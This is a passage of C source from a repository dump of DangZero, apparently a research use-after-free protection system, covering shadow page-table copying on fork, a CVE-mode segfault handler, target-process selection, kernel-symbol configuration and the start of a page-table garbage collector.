// volatile for -O2 1348 | 1349 | while(pml4_index <= max_pml4){ 1350 | // get and copy pdpt 1351 | pdpt = get_table_page(p_cr3, pml4_index); 1352 | if(pdpt == NULL) { pml4_index++; cur_addr+=PML4_ADDR_OFFSET; continue; } 1353 | c_pdpt = create_page_table(g_cr3, pml4_index); 1354 | 1355 | pdpt_index = 0; 1356 | while(pdpt_index < 512){ 1357 | // get and copy pde 1358 | pde = get_table_page(pdpt, pdpt_index); 1359 | if(pde == NULL) { pdpt_index++; cur_addr+=PDPT_ADDR_OFFSET; continue; } 1360 | c_pde = create_page_table(c_pdpt, pdpt_index); 1361 | 1362 | pde_index = 0; 1363 | while(pde_index < 512){ 1364 | // get and copy pte 1365 | pte = get_table_page(pde, pde_index); 1366 | if(pte == NULL) { pde_index++; cur_addr+=PDE_ADDR_OFFSET; continue; } 1367 | c_pte = create_page_table(c_pde, pde_index); 1368 | 1369 | pte_index = 0; 1370 | while(pte_index < 512){ 1371 | // pte+pte_index points to phys page 1372 | if(*(pte+pte_index) & PAGE_PRESENT){ 1373 | // phys page is present 1374 | p_pa = *(pte+pte_index) & PAGE_FRAME; 1375 | uint64_t flags = *(pte+pte_index) & ~(PAGE_FRAME); 1376 | 1377 | // obj not shared on prev pa 1378 | if(p_pa != last_pa){ 1379 | 1380 | // although PA may not be contiguous, VAs are, and shadows are often in sync with VAs 1381 | store_i = i; 1382 | int skip_2nd_loop = 0; 1383 | if(i > 0) 1384 | i += 1; 1385 | 1386 | for(; i < num_addrs; i++){ 1387 | if(addr_map[i].pa == p_pa){ 1388 | // in the child, access the VA to cause CoW backing 1389 | tmp = *((int8_t*)addr_map[i].va); 1390 | *((int8_t*)addr_map[i].va) = tmp; 1391 | 1392 | // look up the physical addr of the new backing 1393 | cow_back = get_phys_addr_user(addr_map[i].va); 1394 | 1395 | // store PA in case next shadow shares it 1396 | last_pa = p_pa; 1397 | 1398 | // found after prev 1399 | skip_2nd_loop = 1; 1400 | break; 1401 | } 1402 | } 1403 | 1404 | if(!skip_2nd_loop){ 1405 | // continue search from 0 to previously found index 1406 | for(i = 0; i < store_i; i++){ 1407 | if(addr_map[i].pa == p_pa){ 1408 | tmp = *((int8_t*)addr_map[i].va); 1409 | *((int8_t*)addr_map[i].va) = tmp; 1410 | cow_back = get_phys_addr_user(addr_map[i].va); 1411 | last_pa = p_pa; 1412 | break; 1413 | } 1414 | } 1415 | } 1416 | } 1417 | 1418 | // update child shadow pte to the new physical backing 1419 | if(cow_back != 0){ 1420 | // make the child shadow point there 1421 | // *(c_pte+pte_index) = (cow_back & PAGE_FRAME) | PAGE_PRESENT | PAGE_WRITABLE; 1422 | *(c_pte+pte_index) = (cow_back & PAGE_FRAME) | flags; 1423 | 1424 | // flush TLB not needed here in fresh process shadow table 1425 | // fprintf(stderr, "fork (%p) VA=%p PA=%p > COW=%p\n", cur_addr, (void*)addr_map[i].va, (void*)p_pa, (void*)(cow_back & PAGE_FRAME)); 1426 | //printf("Fork: VA=%p PA=%p > COW=%p\n", (void*)addr_map[i].va, (void*)p_pa, (void*)(cow_back & PAGE_FRAME)); 1427 | } 1428 | } 1429 | 1430 | cur_addr += PAGE_SIZE; 1431 | if(cur_addr >= end_addr){ 1432 | // fprintf(stderr, "reached the end of shadows: %p\n", (void*)cur_addr); 1433 | #ifdef __GC 1434 | // unset last_sync on all spans 1435 | // force resync if fragmented 1436 | // otherwise realign below is enough 1437 | 1438 | struct vp_span *span; 1439 | /*if(opt_freelist != NULL && opt_freelist->items.lh_first != NULL){ 1440 | LIST_FOREACH(span, &(opt_freelist->items), freelist) { 1441 | span->last_sync = false; 1442 | } 1443 | }*/ 1444 | 1445 | struct vp_freelist *new_list = __libc_malloc(sizeof(struct vp_freelist)); 1446 | memset(new_list, 0, sizeof(struct vp_freelist)); 1447 | if(opt_freelist != NULL){ 1448 | LIST_FOREACH(span, &(opt_freelist->items), freelist){ 1449 | freelist_free(new_list, (void*)span->start, span_num_pages(span)); 1450 | } 1451 | } 1452 | opt_freelist = new_list; 1453 | cur_span = NULL; 1454 | 1455 | // re-alloc freelist with kmalloc 1456 | // since CoW is not triggered on freelist 1457 | #ifdef __GC_PT_COMPRESS 1458 | cpt_nuke(); 1459 | #endif 1460 | #endif 1461 | // realign free_span 1462 | last_pdpt = c_pdpt; 1463 | last_pde = c_pde; 1464 | last_pte = c_pte; 1465 | last_pml4_index = pml4_index; 1466 | last_pdpt_index = pdpt_index; 1467 | last_pde_index = pde_index; 1468 | last_pte_index = pte_index; 1469 | return; 1470 | } 1471 | pte_index++; 1472 | } 1473 | pde_index++; 1474 | } 1475 | pdpt_index++; 1476 | } 1477 | } 1478 | } 1479 | 1480 | #ifdef __ENABLE_FORK_SUPPORT 1481 | pid_t fork(void) 1482 | { 1483 | if(process) 1484 | { 1485 | //printf("[wrap]: fork caught\n"); 1486 | //fprintf(stderr, "enter fork\n"); 1487 | //fflush(stderr); 1488 | 1489 | // create sync for this fork (libc malloc - no instrument) 1490 | fork_sync = mmap(NULL, sizeof(struct _fork_sync), PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS, -1, 0); 1491 | pthread_mutex_init(&fork_sync->mutex, &fork_mutex_attr); 1492 | pthread_cond_init(&fork_sync->cond, &fork_cond_attr); 1493 | fork_sync->copy_done = 0; 1494 | 1495 | //fflush(stderr); 1496 | 1497 | pid_t pid = __libc_fork(); 1498 | if(pid == 0){ 1499 | // child: save parent cr3 1500 | uintptr_t* parent_cr3 = g_cr3; 1501 | 1502 | // call into kernel module 1503 | size_t num_addrs; 1504 | struct map_pa_va* addr_map; 1505 | addr_map = dangzero_create_fork_map(parent_cr3, &num_addrs); 1506 | if(addr_map == NULL){ 1507 | printf("fatal: could not create fork map in kmod!\n"); 1508 | return -1; 1509 | } 1510 | //printf("Obtained addr map of size %lu\n", num_addrs); 1511 | //fprintf(stderr, "fork addr map size: %lu\n", num_addrs); 1512 | 1513 | // update global cr3 for child 1514 | phys_addr_t ccr3; 1515 | asm("movq %%cr3, %0" : "=r" (ccr3)); 1516 | g_cr3 = phys_to_virt(ccr3); 1517 | 1518 | //printf("[wrap] child CR3=%p, parent CR3=%p\n", g_cr3, parent_cr3); 1519 | 1520 | // copy shadow tables 1521 | apply_fork_map(parent_cr3, addr_map, num_addrs); 1522 | 1523 | // free the kmod allocated mapping 1524 | kfree(addr_map); 1525 | 1526 | // wake the parent 1527 | pthread_mutex_lock(&fork_sync->mutex); 1528 | fork_sync->copy_done = 1; 1529 | pthread_cond_signal(&fork_sync->cond); 1530 | //printf("[set to 1, signal raised]\n"); 1531 | pthread_mutex_unlock(&fork_sync->mutex); 1532 | 1533 | // clear fork_sync 1534 | munmap(fork_sync, sizeof(struct _fork_sync)); 1535 | //fprintf(stderr, "fork done\n"); 1536 | } 1537 | else{ 1538 | // parent: wait for child to finish copy 1539 | pthread_mutex_lock(&fork_sync->mutex); 1540 | while(!(fork_sync->copy_done)){ 1541 | //printf("[enter wait loop]\n"); // cannot print with cow here 1542 | pthread_cond_wait(&fork_sync->cond, &fork_sync->mutex); 1543 | //printf("[exit wait]\n"); 1544 | } 1545 | pthread_mutex_unlock(&fork_sync->mutex); 1546 | 1547 | // clear fork_sync 1548 | munmap(fork_sync, sizeof(struct _fork_sync)); 1549 | } 1550 | 1551 | return pid; 1552 | } 1553 | return __libc_fork(); 1554 | } 1555 | #endif 1556 | 1557 | #ifdef __CVE_MODE 1558 | void handler(int sig, siginfo_t* si, void* vcontext) 1559 | { 1560 | uintptr_t addr = (uintptr_t)si->si_addr; 1561 | if(addr >= SHADOW_BASE){ 1562 | fprintf(stderr, "Segfault at: %p\n", si->si_addr); 1563 | // look up pte and check if invalidated 1564 | uintptr_t *pdpt, *pde, *pte; 1565 | unsigned short pml4_index, pdpt_index, pde_index, pte_index; 1566 | 1567 | pml4_index = PML4_INDEX(addr); 1568 | pdpt = get_table_page(g_cr3, pml4_index); //pdpt=cr3+pml4_index 1569 | if(UNLIKELY(pdpt == NULL)) _exit(0); 1570 | 1571 | pdpt_index = PDPT_INDEX(addr); 1572 | pde = get_table_page(pdpt, pdpt_index); //pde=pdpt+pdpt_index 1573 | if(UNLIKELY(pde == NULL)) _exit(0); 1574 | 1575 | pde_index = PDE_INDEX(addr); 1576 | pte = get_table_page(pde, pde_index); //pte=pde+pde_index 1577 | if(UNLIKELY(pte == NULL)) _exit(0); 1578 | 1579 | pte_index = PTE_INDEX(addr); 1580 | 1581 | if(*(pte+pte_index) & PTE_INVALIDATED){ 1582 | fprintf(stderr, "PTE was invalidated\n"); 1583 | } 1584 | else{ 1585 | fprintf(stderr, "PTE still active...\n"); 1586 | } 1587 | } 1588 | else{ 1589 | fprintf(stderr, "Unknown segfault at %p\n", si->si_addr); 1590 | } 1591 | fflush(stderr); 1592 | _exit(0); 1593 | } 1594 | #endif 1595 | 1596 | int8_t is_target(char *program, int argc, char** argv) 1597 | { 1598 | #ifdef __SPEC_MODE 1599 | if(strstr(program, "run_base")){ 1600 | #elif defined(__NGINX_MODE) 1601 | if(strstr(program, "nginx") || strstr(program, "lighttpd")){ 1602 | #elif defined(__JULIET_MODE) 1603 | if(strstr(program, "CWE")){ 1604 | #elif defined(__CVE_MODE) 1605 | if(strstr(program, "consume")){ 1606 | #else 1607 | if(strstr(program, "hello") || strstr(program, "/trusted/") || strstr(program, "dz_")){ 1608 | #endif 1609 | 1610 | //fukp = fopen("/home/u16/Documents/gclog.txt", "a"); 1611 | 1612 | //fprintf(stderr, "set target: %s\n", program); 1613 | /*char filename[256]; 1614 | unsigned long t = time(NULL); 1615 | sprintf(filename, "%sout_%lu.txt", LOG_PATH, t); 1616 | fp = fopen(filename, "w"); 1617 | if(!fp) return 0;*/ 1618 | 1619 | //printf("[DangZero]: Target set: %s\n", program); 1620 | /* int a; 1621 | for(a = 0; a < argc; a++){ 1622 | fprintf(stderr, "argv %d: %s\n", a, argv[a]); 1623 | }*/ 1624 | 1625 | #ifdef __CVE_MODE 1626 | // segfault handler 1627 | struct sigaction action; 1628 | memset(&action, 0, sizeof(struct sigaction)); 1629 | action.sa_flags = SA_SIGINFO; 1630 | action.sa_sigaction = handler; 1631 | sigaction(SIGSEGV, &action, NULL); 1632 | #endif 1633 | 1634 | // global process cr3 1635 | phys_addr_t pcr3; 1636 | asm("movq %%cr3, %0" : "=r" (pcr3)); 1637 | g_cr3 = phys_to_virt(pcr3); 1638 | 1639 | #ifdef __GC 1640 | opt_freelist = __libc_malloc(sizeof(struct vp_freelist)); 1641 | memset(opt_freelist, 0, sizeof(struct vp_freelist)); 1642 | struct vp_span *span = WM_ALLOC(sizeof(struct vp_span)); 1643 | span->start = SHADOW_BASE; 1644 | span->end = SHADOW_END; 1645 | span->last_sync = true; // set up below 1646 | cur_span = span; 1647 | LIST_INSERT_HEAD(&opt_freelist->items, span, freelist); 1648 | #endif 1649 | 1650 | // if-not-GC? 1651 | // set free span 1652 | free_span.start = SHADOW_BASE; 1653 | free_span.end = SHADOW_END; 1654 | 1655 | // set up page walk ptrs 1656 | last_pdpt = step_shadow_table(g_cr3, PML4_SHADOW_START); 1657 | last_pde = step_shadow_table(last_pdpt, 0); 1658 | last_pte = step_shadow_table(last_pde, 0); 1659 | 1660 | __posix_memalign = (proto_posix_memalign) dlsym(RTLD_NEXT, "posix_memalign"); 1661 | 1662 | #ifdef __ENABLE_FORK_SUPPORT 1663 | // look up kernel module function 1664 | dangzero_create_fork_map = (proto_dangzero_create_fork_map) kallsyms_lookup_name("dangzero_create_fork_map"); 1665 | if(!dangzero_create_fork_map){ 1666 | printf("[fatal!!] DangZero Kmod lookup fork failed.\n"); 1667 | fflush(stdout); 1668 | fprintf(stderr, "[fatal!!] DangZero Kmod lookup fork failed.\n"); 1669 | fflush(stderr); 1670 | return 0; 1671 | } 1672 | 1673 | // set up attributes for fork sync 1674 | pthread_mutexattr_init(&fork_mutex_attr); 1675 | pthread_condattr_init(&fork_cond_attr); 1676 | pthread_mutexattr_setpshared(&fork_mutex_attr, PTHREAD_PROCESS_SHARED); 1677 | pthread_condattr_setpshared(&fork_cond_attr, PTHREAD_PROCESS_SHARED); 1678 | #endif 1679 | 1680 | #ifdef __GC 1681 | dangzero_find_vma_bounds = (proto_dangzero_find_vma_bounds) kallsyms_lookup_name("dangzero_find_vma_bounds"); 1682 | dangzero_mark_heap = (proto_dangzero_mark_heap) kallsyms_lookup_name("dangzero_mark_heap"); 1683 | if(!dangzero_find_vma_bounds || !dangzero_mark_heap){ 1684 | fprintf(stderr, "cannot find gc heap dangmod\n"); 1685 | return 0; 1686 | } 1687 | #endif 1688 | 1689 | //fprintf(stderr, "set target done\n"); 1690 | return 1; 1691 | } 1692 | return 0; 1693 | } 1694 | 1695 | typedef int (*main_t)(int, char, char); 1696 | typedef int (*libc_start_main_t)(main_t main, int argc, char** ubp_av, 1697 | void (*init)(void), void (*fini)(void), void (*rtld_fini)(void), void* stack_end); 1698 | 1699 | int __libc_start_main(main_t main, int argc, char** ubp_av, 1700 | void (*init)(void), void (*fini)(void), void (*rtld_fini)(void), void* stack_end) 1701 | { 1702 | libc_start_main_t og_libc_start_main = (libc_start_main_t)dlsym(RTLD_NEXT, "__libc_start_main"); 1703 | process = is_target(ubp_av[0], argc, ubp_av); 1704 | og_libc_start_main(main, argc, ubp_av, init, fini, rtld_fini, stack_end); 1705 | 1706 | } 1707 | -------------------------------------------------------------------------------- /dz.h: -------------------------------------------------------------------------------- 1 | #ifndef DANGZERO_H 2 | #define DANGZERO_H 3 | #define LOG(...) //printf(__VA_ARGS__) 4 | #define LIKELY(COND) __builtin_expect((COND), 1) 5 | #define UNLIKELY(COND) __builtin_expect((COND), 0) 6 | #define PAGE_SIZE 4096 7 | 8 | #define __GC 9 | #define __GC_PT_COMPRESS 10 | //#define __GC_WATERMARK (10000000ULL) // pages 11 | #define NUM_BUCKETS 10000 12 | #define WM_ALLOC(sz) kmalloc(sz, GFP_NOWAIT) 13 | //#define WM_ALLOC(sz) __libc_malloc(sz) 14 | #define WM_FREE(ptr) kfree(ptr) 15 | //#define WM_FREE(ptr) __libc_free(ptr) 16 | //#define WM_ZERO 17 | 18 | // regular malloc for WM is useful for memory overhead measurements 19 | 20 | //#define __PT_RECLAIM 21 | 22 | //#define __TRACK_SHADOW_SIZE 23 | #define OUTPUT_FREQ 100000 // every n allocs output shadow sz 24 | 25 | //#define __TRACK_MEM_USAGE 26 | //#define __SANITY_CHECK 27 | #define __ENABLE_FORK_SUPPORT 28 | 29 | // page table indexing 30 | #define PAGE_MASK (~(PAGE_SIZE-1)) // to disable the page flags (e.g. 0x20d4067 -> 0x20d4000) 31 | #define PAGE_FRAME 0x000ffffffffff000UL 32 | #define PAGE_MASK_INDEX 0x1FF // 511 33 | #define MAX_PAGE_INDEX 511 34 | #define PML4_INDEX(x) ((x >> 39) & PAGE_MASK_INDEX) 35 | #define PDPT_INDEX(x) ((x >> 30) & PAGE_MASK_INDEX) 36 | #define PDE_INDEX(x) ((x >> 21) & PAGE_MASK_INDEX) 37 | #define PTE_INDEX(x) ((x >> 12) & PAGE_MASK_INDEX) 38 | 39 | #define PML4_ADDR_OFFSET 0x8000000000 40 | #define PDPT_ADDR_OFFSET 0x40000000 41 | #define PDE_ADDR_OFFSET 0x200000 42 | 43 | // arch/x86/include/asm/pgtable_types.h 44 | #define PAGE_PRESENT 1 45 | #define PAGE_WRITABLE 2 46 | #define PAGE_DIRTY (1 << 6) 47 | #define PAGE_HUGE (1 << 7) 48 | 49 | // arch/x86/include/asm/page_64_types.h: 50 | #define PAGE_OFFSET 0xffff880000000000UL 51 | #define __START_KERNEL_map 0xffffffff80000000UL 52 | typedef uint64_t phys_addr_t; 53 | 54 | /* 55 | > the gap for direct mapping of all physical memory is 64TB 56 | > that is: 0xffff888000000000 ~ 0xffffc87fffffffff 57 | > the corresponding PML4s are entries 273 ~ 400 58 | > note that PML4E 272 is used for the guard hole for hypervisor (and seems present on QEMU) 59 | > assuming the system uses 27 x 512 GB physical memory at most (which is insane) 60 | > we start our shadow mapping at PML4E 300 (300 << 39 == 0xffff960000000000) 61 | > and it ends including PML4E 400 (0xffffc87fffffffff) 62 | > this gives us a little over 50 TB of PT shadow space (about 12.5 billion shadow pages) 63 | */ 64 | #define PML4_SHADOW_START 300 65 | #define PML4_SHADOW_END 400 66 | #define SHADOW_BASE 0xffff960000000000 67 | #define SHADOW_END 0xffffc88000000000 //0xffffc87fffffffff 68 | 69 | void* __libc_malloc(size_t size); 70 | void* __libc_calloc(size_t nmemb, size_t size); 71 | void* __libc_realloc(void* ptr, size_t size); 72 | void* __libc_memalign(size_t alignment, size_t size); 73 | void* __libc_free(void* ptr); 74 | #ifdef __ENABLE_FORK_SUPPORT 75 | pid_t __libc_fork(void); 76 | #endif 77 | 78 | // monica vm 79 | // kernel function symbols (obtained through command "nm vmlinux" or "sudo cat /proc/kallsyms" 80 | /*#define SYMBOL_ADDR_get_zeroed_page 0xffffffff811131a0 81 | #define SYMBOL_ADDR_free_pages 0xffffffff81115bc0 82 | #define SYMBOL_ADDR___get_free_pages 0xffffffff81113160 83 | #define SYMBOL_ADDR_kallsyms_lookup_name 0xffffffff810bd350 84 | #define SYMBOL_ADDR_kfree 0xffffffff811593c0 85 | #define SYMBOL_ADDR_kmalloc 0xffffffff81159070 86 | */ 87 | 88 | #define SYMBOL_ADDR_get_zeroed_page 0xffffffff811635d0//0xffffffff811131a0 89 | #define SYMBOL_ADDR_free_pages 0xffffffff81166480//0xffffffff81115bc0 90 | #define SYMBOL_ADDR___get_free_pages 0xffffffff81163580//0xffffffff81113160 91 | #define SYMBOL_ADDR_kallsyms_lookup_name 0xffffffff810e3870//0xffffffff810bd350 92 | #define SYMBOL_ADDR_kfree 0xffffffff811b4b40//0xffffffff811593c0 93 | #define SYMBOL_ADDR_kmalloc 0xffffffff811b5c40 94 | 95 | // dangzero kernel module 96 | typedef struct map_pa_va* (*proto_dangzero_create_fork_map)(uintptr_t* cr3, size_t* n); 97 | proto_dangzero_create_fork_map dangzero_create_fork_map; 98 | 99 | // kernel functions 100 | typedef unsigned long (*proto_get_zeroed_page)(unsigned int); 101 | typedef void (*proto_free_pages)(unsigned long addr, unsigned int order); 102 | typedef unsigned long (*proto___get_free_pages)(unsigned mask, unsigned int order); 103 | typedef void (*proto_kfree)(const void*); 104 | typedef void* (*proto_kmalloc)(size_t size, unsigned flag); 105 | // include/linux/kallsyms.h 106 | typedef unsigned long (*proto_kallsyms_lookup_name)(const char* name); 107 | 108 | // linux-4.0/include/linux/gfp.h 109 | #define GFP_NOWAIT 0 110 | #define GFP_KERNEL 208 111 | 112 | // arch/x86/include/asm/io.h: 113 | // only valid to use this function on addresses directly mapped or allocated via kmalloc 114 | static phys_addr_t virt_to_phys(volatile void* address) 115 | { 116 | return (phys_addr_t)address - PAGE_OFFSET; 117 | } 118 | 119 | static void* phys_to_virt(phys_addr_t address) 120 | { 121 | return (void*)(address + PAGE_OFFSET); 122 | } 123 | 124 | #ifdef __GC 125 | struct vp_span { 126 | uint64_t start; 127 | uint64_t end; 128 | bool last_sync; // page walk optimization 129 | LIST_ENTRY(vp_span) freelist; 130 | }; 131 | 132 | struct vp_freelist { 133 | // Singly-linked list of vp_span objects, ordered by span->end (ascending) 134 | LIST_HEAD(, vp_span) items; 135 | }; 136 | 137 | //uint64_t freelist_size(); 138 | int freelist_free(struct vp_freelist *list, void *p, size_t npages); 139 | struct vp_span *try_merge_spans(struct vp_span *left, struct vp_span *right); 140 | #endif 141 | 142 | 143 | #ifdef __TRACK_SHADOW_SIZE 144 | void output_shadow_size(bool gc); 145 | #endif 146 | uintptr_t* create_page_table(uintptr_t* table, unsigned short entry); 147 | static uintptr_t* get_table_page(uintptr_t* table, unsigned short index); 148 | static uintptr_t* get_table_page_nocheck(uintptr_t* table, unsigned short index); 149 | phys_addr_t get_phys_addr_user(uintptr_t addr); 150 | #ifdef __GC_PT_COMPRESS 151 | uintptr_t* step_shadow_table_L2cpt(uintptr_t* table, unsigned short index); 152 | #endif 153 | uintptr_t* step_shadow_table(uintptr_t* table, unsigned short index); 154 | void disable_shadow_one(uintptr_t addr); 155 | void disable_shadows(uintptr_t base, size_t num_pages); 156 | uintptr_t* create_shadow_one(uintptr_t canon, size_t offset); 157 | uintptr_t* create_shadows(uintptr_t canon, size_t num_pages, size_t offset); 158 | 159 | #endif 160 | -------------------------------------------------------------------------------- /gc.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Collector for freed objects, to allow for reuse of virtual addresses in alias 3 | * space. 4 | * 5 | * We scan all alive memory (regs, stack, data, alive heap objects) for (things 6 | * that look like) pointers to the aliassed heap during the marking phase. 7 | * Then we perform a sweep where each object that was freed and not marked is 8 | * given back to the alias allocator for reuse. 9 | * 10 | * We reuse the page tables as data structures for GC administration (e.g., 11 | * marking). 12 | * 13 | * Originally created by Koen Koning (Dangless project) 14 | */ 15 | 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | 23 | //#define NDEBUG // disable assertions 24 | #include 25 | #define ASSERT0 assert 26 | 27 | #include "queue.h" 28 | #include "dz.h" 29 | #include "gc.h" 30 | 31 | #ifdef __GC 32 | extern uintptr_t* g_cr3; 33 | extern proto___get_free_pages __get_free_pages; 34 | extern proto_free_pages free_pages; 35 | extern uint64_t highest_shadow; 36 | extern struct vp_freelist* g_freelist; 37 | extern uint64_t bucket_size; 38 | extern bool fragmented; 39 | //extern unsigned curr_bucket; 40 | extern struct vp_freelist *opt_freelist; 41 | extern struct vp_span **sub_spans; 42 | extern proto_kfree kfree; 43 | extern proto_kmalloc kmalloc; 44 | 45 | #ifdef __TRACK_MEM_USAGE 46 | extern uint64_t max_pt_count; 47 | extern uint64_t curr_pt_count; 48 | #endif 49 | 50 | /* dangless functionality re-implemented */ 51 | static cpt_t *cpt_freelist; 52 | 53 | static inline unsigned pt_level_shift(enum pt_level level) { 54 | return PGSHIFT + (level - 1) * PT_BITS_PER_LEVEL; 55 | } 56 | 57 | static inline size_t pt_level_offset(vaddr_t va, enum pt_level level) { 58 | return (va >> pt_level_shift(level)) & (PT_NUM_ENTRIES - 1); 59 | } 60 | 61 | static inline u64 rcr3(void) { 62 | return (u64)g_cr3; 63 | } 64 | 65 | void *pt_paddr2vaddr(paddr_t pa) { 66 | return phys_to_virt(pa); 67 | } 68 | /* Upper 16 bits of addresses are sign-extended. */ 69 | static inline vaddr_t sext(vaddr_t va) 70 | { 71 | if (va & (1UL << 47)) 72 | va |= 0xffff800000000000UL; 73 | return va; 74 | } 75 | // Calculates the number of 4K pages mapped by an entry at the given pagetable level. 76 | static inline size_t pt_num_mapped_pages(enum pt_level level) { 77 | return 1uL << ((level - 1) * PT_BITS_PER_LEVEL); 78 | } 79 | /* end of dangless re-implemented */ 80 | 81 | 82 | static uintptr_t stack_top; 83 | static uintptr_t bss_start, bss_end; 84 | static uintptr_t data_start, data_end; 85 | 86 | /* 87 | * Generate variables in data and bss mappings so we can scan for their 88 | * addresses in proc maps. 89 | */ 90 | static int bss_seg_var = 0; 91 | static int data_seg_var = 1; 92 | 93 | 94 | static uintptr_t get_stack_pointer(void) 95 | { 96 | uintptr_t rsp; 97 | asm ("mov %%rsp, %0" : "=r"(rsp)); 98 | return rsp; 99 | } 100 | 101 | static inline bool is_potential_ptr(uintptr_t v) 102 | { 103 | return SHADOW_BASE <= v && v <= SHADOW_END; 104 | } 105 | 106 | ///// reclaiming (non-gc) ///// 107 | int pt_is_collectable(pte_t *pt) 108 | { 109 | unsigned pte_idx; 110 | 111 | for (pte_idx = 0; pte_idx < PT_NUM_ENTRIES; pte_idx++) 112 | if (!(pt[pte_idx] & PTE_INVALIDATED)) 113 | return 0; 114 | 115 | return 1; 116 | } 117 | 118 | static unsigned try_collect_pt_rec(vaddr_t va, 119 | vaddr_t va_end, 120 | enum pt_level level, 121 | pte_t *pt) 122 | { 123 | pte_t *ppte, *nextpt; 124 | size_t ptoff; 125 | paddr_t nextpt_pa; 126 | unsigned freed = 0, next_freed; 127 | 128 | vaddr_t va_level_next, va_level_end; 129 | size_t level_inc = 1UL << pt_level_shift(level); 130 | 131 | if (level == PT_L1) { 132 | //LOG("pt%d %p \n", level, pt); 133 | return 1; 134 | } 135 | 136 | while (va < va_end) { 137 | ptoff = pt_level_offset(va, level); 138 | va_level_next = (va + level_inc) & ~(level_inc - 1); 139 | va_level_end = va_end < va_level_next ? va_end : va_level_next; 140 | 141 | ppte = &pt[ptoff]; 142 | //LOG("pt%d va=%p pt=%p off=%zx pte=%lx\n", level, va, pt, ptoff, *ppte); 143 | if (!FLAG_ISSET(*ppte, PTE_P) || FLAG_ISSET(*ppte, PTE_PS)) 144 | return 0; 145 | 146 | nextpt_pa = *ppte & PTE_FRAME; 147 | nextpt = (pte_t*)pt_paddr2vaddr(nextpt_pa); 148 | 149 | next_freed = try_collect_pt_rec(va, va_level_end, level - 1, nextpt); 150 | 151 | if (next_freed == 512 || 152 | (next_freed > 0 && pt_is_collectable(nextpt))) { 153 | //LOG(" ########## pt%d empty, freeing %lx in pte %p\n", level - 1, 154 | // nextpt_pa, ppte); 155 | //virtual_invalidate_pte(ppte); 156 | *ppte = PTE_INVALIDATED | PTE_ALIASSES; 157 | 158 | //pp_free_one(nextpt_pa); 159 | free_pages((unsigned long)nextpt, 0); 160 | #ifdef __TRACK_MEM_USAGE 161 | curr_pt_count--; 162 | #endif 163 | freed++; 164 | 165 | //STATISTIC_UPDATE() { 166 | // st_num_pagetables_collected++; 167 | //} 168 | } 169 | va = va_level_next; 170 | 171 | //LOG("pt%d next va=%p end=%p next_freed=%u freed=%u\n", level, va, va_end, next_freed, freed); 172 | 173 | } 174 | 175 | return freed; 176 | } 177 | 178 | void try_collect_pt(vaddr_t va, size_t npages) 179 | { 180 | vaddr_t va_end = PG_OFFSET(va, npages); 181 | pte_t *ptroot = (pte_t*)g_cr3; 182 | //LOG("Collecting %lx - %lx (%zx pages)\n", va, va_end, npages); 183 | try_collect_pt_rec(va, va_end, PT_L4, ptroot); 184 | } 185 | 186 | 187 | ///// compression ///// 188 | static inline size_t cpt_bitnum_to_wordidx(size_t bitnum) 189 | { 190 | ASSERT0(bitnum < CPT_SIZE_BITS); 191 | return bitnum / (sizeof(uintptr_t) * 8); 192 | } 193 | static inline size_t cpt_bitnum_to_wordbit(size_t bitnum) 194 | { 195 | ASSERT0(bitnum < CPT_SIZE_BITS); 196 | return bitnum % (sizeof(uintptr_t) * 8); 197 | } 198 | static inline bool cpt_get_bit(cpt_t *cpt, size_t bitnum) 199 | { 200 | ASSERT0(bitnum < CPT_SIZE_BITS); 201 | uintptr_t *cpt_words = (uintptr_t *)cpt; 202 | uintptr_t word = cpt_words[cpt_bitnum_to_wordidx(bitnum)]; 203 | return (word >> cpt_bitnum_to_wordbit(bitnum)) & 1; 204 | } 205 | 206 | static inline void cpt_set_bit(cpt_t *cpt, size_t bitnum, bool val) 207 | { 208 | ASSERT0(bitnum < CPT_SIZE_BITS); 209 | ASSERT0(val == 0 || val == 1); 210 | uintptr_t *cpt_words = (uintptr_t *)cpt; 211 | uintptr_t *wordp = &cpt_words[cpt_bitnum_to_wordidx(bitnum)]; 212 | size_t bitpos = cpt_bitnum_to_wordbit(bitnum); 213 | *wordp = (*wordp & ~(1UL << bitpos)) | ((uintptr_t)val << bitpos); 214 | } 215 | 216 | bool cpt_get_entry(cpt_t *cpt, size_t idx, enum cpt_field field) 217 | { 218 | ASSERT0(idx < PT_NUM_ENTRIES); 219 | ASSERT0(field < CPT_NUM_FIELDS); 220 | return cpt_get_bit(cpt, idx * CPT_NUM_FIELDS + field); 221 | } 222 | 223 | void cpt_set_entry(cpt_t *cpt, size_t idx, enum cpt_field field, bool val) 224 | { 225 | ASSERT0(idx < PT_NUM_ENTRIES); 226 | ASSERT0(field < CPT_NUM_FIELDS); 227 | cpt_set_bit(cpt, idx * CPT_NUM_FIELDS + field, val); 228 | } 229 | 230 | // temp 231 | /*uint64_t cpt_size = 0; 232 | uint64_t out_cpt_list_size() 233 | { 234 | return cpt_size; 235 | } 236 | */ 237 | 238 | static void grow_cpt_freelist(void) 239 | { 240 | char *pg; 241 | size_t i; 242 | 243 | ASSERT0(cpt_freelist == NULL); 244 | 245 | // allocate CPT_SLAB_PAGES pages (== 1 right now, so order 0) 246 | pg = (char *)__get_free_pages(GFP_NOWAIT, 0); // ptpa = pp_zalloc_one(); 247 | // memset((void*)pt, 0, PAGE_SIZE); 248 | 249 | #ifdef __TRACK_MEM_USAGE 250 | curr_pt_count++; 251 | if(curr_pt_count > max_pt_count){ 252 | max_pt_count = curr_pt_count; 253 | } 254 | #endif 255 | 256 | // pg = (char *)pp_alloc(CPT_SLAB_PAGES); 257 | // if (!pg) { 258 | // vdprintf_nomalloc("Could not allocate cpt page\n"); 259 | // _dangless_assert_fail(); 260 | // } 261 | 262 | for (i = 0; i + CPT_SIZE_BYTES < CPT_SLAB_SIZE; i += CPT_SIZE_BYTES) { 263 | cpt_t **cpt = (cpt_t **)&pg[i]; 264 | *cpt = cpt_freelist; 265 | cpt_freelist = cpt; 266 | // temp 267 | //cpt_size++; 268 | } 269 | } 270 | 271 | cpt_t *cpt_alloc(void) 272 | { 273 | void *ret; 274 | 275 | if (!cpt_freelist) 276 | grow_cpt_freelist(); 277 | 278 | ret = cpt_freelist; 279 | cpt_freelist = *((cpt_t **)cpt_freelist); 280 | // temp 281 | //cpt_size--; 282 | 283 | //LOG("cpt alloc: %lx\n", ret); 284 | return ret; 285 | } 286 | 287 | void cpt_free(cpt_t *cpt) 288 | { 289 | *((cpt_t **)cpt) = cpt_freelist; 290 | cpt_freelist = cpt; 291 | 292 | // temp 293 | //cpt_size++; 